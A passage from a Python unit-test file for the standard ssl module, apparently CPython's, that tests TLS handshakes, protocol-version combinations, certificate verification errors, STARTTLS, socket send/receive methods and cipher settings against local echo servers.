context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
# TLS 1.3 perform client cert exchange after handshake
s.connect((HOST, server.port))
try:
s.write(b'data')
s.read(4)
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = support.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv2'),
"OpenSSL is compiled without SSLv2 support")
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv2)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
# Will choose TLSv1
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, 'PROTOCOL_SSLv3'),
"OpenSSL is compiled without SSLv3 support")
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
if no_sslv2_implies_sslv3_hello():
# No SSLv2 => client will use an SSLv3 hello on recent OpenSSLs
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS,
False, client_options=ssl.OP_NO_SSLv2)
@skip_if_broken_ubuntu_ssl
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_1"),
"TLS version 1.1 not supported.")
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_1, False)
@skip_if_broken_ubuntu_ssl
@unittest.skipUnless(hasattr(ssl, "PROTOCOL_TLSv1_2"),
"TLS version 1.2 not supported.")
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if hasattr(ssl, 'PROTOCOL_SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if hasattr(ssl, 'PROTOCOL_SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(1)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
d2 = ''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
msg = "sending with {}".format(meth_name)
self.assertEqual(ret, ret_val_meth(indata), msg=msg)
outdata = s.read()
if outdata != indata.lower():
self.fail(
"While sending with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to send with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
for meth_name, recv_meth, expect_success, args in recv_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
s.send(indata)
outdata = recv_meth(*args)
if outdata != indata.lower():
self.fail(
"While receiving with <<{name:s}>> bad data "
"<<{outdata:r}>> ({nout:d}) received; "
"expected <<{indata:r}>> ({nin:d})\n".format(
name=meth_name, outdata=outdata[:20],
nout=len(outdata),
indata=indata[:20], nin=len(indata)
)
)
except ValueError as e:
if expect_success:
self.fail(
"Failed to receive with method <<{name:s}>>; "
"expected to succeed.\n".format(name=meth_name)
)
if not str(e).startswith(meth_name):
self.fail(
"Method <<{name:s}>> failed with unexpected "
"exception message: {exp:s}\n".format(
name=meth_name, exp=e
)
)
# consume data
s.read()
# read(-1, buffer) is supported, even though read(-1) is not
data = b"data"
s.send(data)
buffer = bytearray(len(data))
self.assertEqual(s.read(-1, buffer), len(data))
self.assertEqual(buffer, data)
# sendall accepts bytes-like objects
if ctypes is not None:
ubyte = ctypes.c_ubyte * len(data)
byteslike = ubyte.from_buffer_copy(data)
s.sendall(byteslike)
self.assertEqual(s.read(), data)
# Make sure sendmsg et al are disallowed to avoid
# inadvertent disclosure of data and/or corruption
# of the encrypted data stream
self.assertRaises(NotImplementedError, s.dup)
self.assertRaises(NotImplementedError, s.sendmsg, [b"data"])
self.assertRaises(NotImplementedError, s.recvmsg, 100)
self.assertRaises(NotImplementedError,
s.recvmsg_into, [bytearray(100)])
s.write(b"over\n")
self.assertRaises(ValueError, s.recv, -1)
self.assertRaises(ValueError, s.read, -1)
s.close()
def test_recv_zero(self):
server = ThreadedEchoServer(CERTFILE)
server.__enter__()
self.addCleanup(server.__exit__, None, None)
s = socket.create_connection((HOST, server.port))
self.addCleanup(s.close)
s = test_wrap_socket(s, suppress_ragged_eofs=False)
self.addCleanup(s.close)
# recv/read(0) should return no data
s.send(b"data")
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.read(0), b"")
self.assertEqual(s.read(), b"data")
# Should not block if the other end sends no data
s.setblocking(False)
self.assertEqual(s.recv(0), b"")
self.assertEqual(s.recv_into(bytearray()), 0)
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_CLIENT)
s.connect((HOST, server.port))
s.setblocking(False)
# If we keep sending data, at some point the buffers
# will be full and the call will block
buf = bytearray(8192)
def fill_buffer():
while True:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output and discard it
s.setblocking(True)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = False
def serve():
server.listen()
started.set()
conns = []
while not finish:
r, w, e = select.select([server], [], [], 0.1)
if server in r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
for sock in conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
try:
try:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
test_wrap_socket, c)
finally:
c.close()
try:
c = socket.socket(socket.AF_INET)
c = test_wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake and time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
finally:
c.close()
finally:
finish = True
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(SIGNING_CA)
context.load_cert_chain(SIGNED_CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=True)
self.assertTrue(server.server_side)
evt = threading.Event()
remote = None
peer = None
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept and wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.send(remote.recv(4))
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup and perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client.send(b'data')
client.recv()
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
with context.wrap_socket(socket.socket()) as sock:
with self.assertRaises(OSError) as cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_no_shared_ciphers(self):
client_context, server_context, hostname = testing_context()
# OpenSSL enables all TLS 1.3 ciphers, enforce TLS 1.2 for test
client_context.options |= ssl.OP_NO_TLSv1_3
# Force different suites on client and master
client_context.set_ciphers("AES128")
server_context.set_ciphers("AES256")
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", server.conn_errors[0])
def test_version_basic(self):
"""
Basic tests for SSLSocket.version().
More tests are done in the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.check_hostname = False
context.verify_mode = ssl.CERT_NONE
with ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
chatty=False) as server:
with context.wrap_socket(socket.socket()) as s:
self.assertIs(s.version(), None)
self.assertIs(s._sslobj, None)
s.connect((HOST, server.port))
if IS_OPENSSL_1_1_1 and ssl.HAS_TLSv1_3:
self.assertEqual(s.version(), 'TLSv1.3')
elif ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
self.assertEqual(s.version(), 'TLSv1.2')
else: # 0.9.8 to 1.0.1
self.assertIn(s.version(), ('TLSv1', 'TLSv1.2'))
self.assertIs(s._sslobj, None)
self.assertIs(s.version(), None)
@unittest.skipUnless(ssl.HAS_TLSv1_3,
"test requires TLSv1.3 enabled OpenSSL")
def test_tls1_3(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
context.options |= (
ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1 | ssl.OP_NO_TLSv1_2
)
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn(s.cipher()[0], {
'TLS_AES_256_GCM_SHA384',
'TLS_CHACHA20_POLY1305_SHA256',
'TLS_AES_128_GCM_SHA256',
})
self.assertEqual(s.version(), 'TLSv1.3')
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
def test_min_max_version(self):
client_context, server_context, hostname = testing_context()
# client TLSv1.0 to 1.2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
# server only TLSv1.2
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.2')
# client 1.0 to 1.2, server 1.0 to 1.1
server_context.minimum_version = ssl.TLSVersion.TLSv1
server_context.maximum_version = ssl.TLSVersion.TLSv1_1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'TLSv1.1')
# client 1.0, server 1.2 (mismatch)
server_context.minimum_version = ssl.TLSVersion.TLSv1_2
server_context.maximum_version = ssl.TLSVersion.TLSv1_2
client_context.minimum_version = ssl.TLSVersion.TLSv1
client_context.maximum_version = ssl.TLSVersion.TLSv1
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLError) as e:
s.connect((HOST, server.port))
self.assertIn("alert", str(e.exception))
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
@unittest.skipUnless(ssl.HAS_SSLv3, "requires SSLv3 support")
def test_min_max_version_sslv3(self):
client_context, server_context, hostname = testing_context()
server_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.minimum_version = ssl.TLSVersion.SSLv3
client_context.maximum_version = ssl.TLSVersion.SSLv3
with ThreadedEchoServer(context=server_context) as server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
self.assertEqual(s.version(), 'SSLv3')
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_TLS)
context.load_cert_chain(CERTFILE)
# TLSv1.3 defaults to PFS key agreement and no longer has KEA in
# cipher name.
context.options |= ssl.OP_NO_TLSv1_3
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
if ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
with ThreadedEchoServer(context=context) as server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context,
chatty=True,
connectionchatty=False)
with server:
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
" got channel binding data: {0!r}\n".format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
# now, again
with client_context.wrap_socket(
socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(
"got another channel binding data: {0!r}\n".format(
new_cb_data)
)
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
if s.version() == 'TLSv1.3':
self.assertEqual(len(cb_data), 48)
else:
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
def test_compression(self):
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
client_context, server_context, hostname = testing_context()
client_context.options |= ssl.OP_NO_COMPRESSION
server_context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
client_context, server_context, hostname = testing_context()
# test scenario needs TLS <= 1.2
client_context.options |= ssl.OP_NO_TLSv1_3
server_context.load_dh_params(DHFILE)
server_context.set_ciphers("kEDH")
server_context.options |= ssl.OP_NO_TLSv1_3
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
@unittest.skipUnless(HAVE_SECP_CURVES, "needs secp384r1 curve support")
@unittest.skipIf(IS_OPENSSL_1_1_1, "TODO: Test doesn't work on 1.1.1")
def test_ecdh_curve(self):
# server secp384r1, client auto
client_context, server_context, hostname = testing_context()
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server auto, client secp384r1
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
# server / client curve mismatch
client_context, server_context, hostname = testing_context()
client_context.set_ecdh_curve("prime256v1")
server_context.set_ecdh_curve("secp384r1")
server_context.set_ciphers("ECDHE:!eNULL:!aNULL")
server_context.options |= ssl.OP_NO_TLSv1 | ssl.OP_NO_TLSv1_1
try:
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
except ssl.SSLError:
pass
else:
# OpenSSL 1.0.2 does not fail although it should.
if IS_OPENSSL_1_1_0:
self.fail("mismatch curve did not fail")
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
client_context, server_context, hostname = testing_context()
stats = server_params_test(client_context, server_context,
